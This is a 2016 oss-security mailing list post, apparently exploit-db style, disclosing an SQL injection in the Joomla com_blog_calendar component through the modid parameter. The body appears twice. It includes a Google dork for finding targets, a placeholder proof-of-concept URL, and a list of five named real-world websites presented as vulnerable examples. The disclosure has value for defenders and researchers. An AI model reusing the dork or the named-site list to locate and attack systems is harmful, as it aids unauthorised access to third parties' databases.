Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 26 Dec 2016 16:08:45 +0700
From: "Steevee a.k.a Stefanus" <steevee.aka@...il.com>
To: oss-security@...ts.openwall.com
Subject: Joomla com_blog_calendar SQL Injection Vulnerability

==========================================================================================
Joomla com_blog_calendar SQL Injection Vulnerability
==========================================================================================

:-------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Joomla com_blog_calendar SQL Injection Vulnerability
: # Date : 26th December 2016
: # Author : X-Cisadane
: # CMS Name : Joomla
: # CMS Developer : http://joomlacode.org/gf/project/blog_calendar/
: # Category : Web Application
: # Vulnerability : SQL Injection
: # Tested On : SQLMap 1.0.12.9#dev
: # Greetz to : X-Code YogyaFree, ExploreCrew, CodeNesia, Bogor Hackers
Community, Borneo Crew, Depok Cyber, Mantan
:-------------------------------------------------------------------------------------------------------------------------:

A SQL Injection Vulnerability has been discovered in the Joomla Module
called com_blog_calendar.
The Vulnerability is located in the
index.php?option=com_blog_calendar&modid=xxx Parameter.
Attackers are able to execute own SQL commands by usage of a GET Method
Request with manipulated modid Value.
Attackers are able to read Database information by execution of own SQL
commands.

DORKS (How to find the target) :
================================
inurl:/index.php?option=com_blog_calendar
Or use your own Google Dorks :)

Proof of Concept
================

SQL Injection
PoC :
http://[Site]/[Path]/index.php?option=com_blog_calendar&modid=['SQLi]

Screenshot (PoC) : http://i64.tinypic.com/2rqhhk4.png

Example of Vuln Sites :
https://www.zen-road.org/index.php?option=com_blog_calendar&modid=['SQLi]
http://www3.unitus.it/index.php?option=com_blog_calendar&modid=['SQLi]
http://chausyleshoz.by/en/index.php?option=com_blog_calendar&modid=['SQLi]
http://www.foms.kg/index.php?option=com_blog_calendar&modid=['SQLi]
http://www.iab.com.bd/index.php?option=com_blog_calendar&modid=['SQLi]
... etc ...

-= Regards =-
 Steevee A.K.A

[ CONTENT OF TYPE text/html SKIPPED ]

========================================================================================== 
Joomla com_blog_calendar SQL Injection Vulnerability 
========================================================================================== 

:-------------------------------------------------------------------------------------------------------------------------: 
: # Exploit Title : Joomla com_blog_calendar SQL Injection Vulnerability  
: # Date : 26th December 2016  
: # Author : X-Cisadane 
: # CMS Name : Joomla 
: # CMS Developer : http://joomlacode.org/gf/project/blog_calendar/ 
: # Category : Web Application 
: # Vulnerability : SQL Injection 
: # Tested On : SQLMap 1.0.12.9#dev
: # Greetz to : X-Code YogyaFree, ExploreCrew, CodeNesia, Bogor Hackers Community, Borneo Crew, Depok Cyber, Mantan 
:-------------------------------------------------------------------------------------------------------------------------: 

A SQL Injection Vulnerability has been discovered in the Joomla Module called com_blog_calendar. 
The Vulnerability is located in the index.php?option=com_blog_calendar&modid=xxx Parameter. 
Attackers are able to execute own SQL commands by usage of a GET Method Request with manipulated modid Value. 
Attackers are able to read Database information by execution of own SQL commands. 
  
DORKS (How to find the target) : 
================================  
inurl:/index.php?option=com_blog_calendar 
Or use your own Google Dorks :) 

Proof of Concept  
================  

SQL Injection 
PoC :  
http://[Site]/[Path]/index.php?option=com_blog_calendar&modid=['SQLi]  

Screenshot (PoC) : http://i64.tinypic.com/2rqhhk4.png 

Example of Vuln Sites : 
https://www.zen-road.org/index.php?option=com_blog_calendar&modid=['SQLi] 
http://www3.unitus.it/index.php?option=com_blog_calendar&modid=['SQLi] 
http://chausyleshoz.by/en/index.php?option=com_blog_calendar&modid=['SQLi] 
http://www.foms.kg/index.php?option=com_blog_calendar&modid=['SQLi] 
http://www.iab.com.bd/index.php?option=com_blog_calendar&modid=['SQLi] 
... etc ...

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ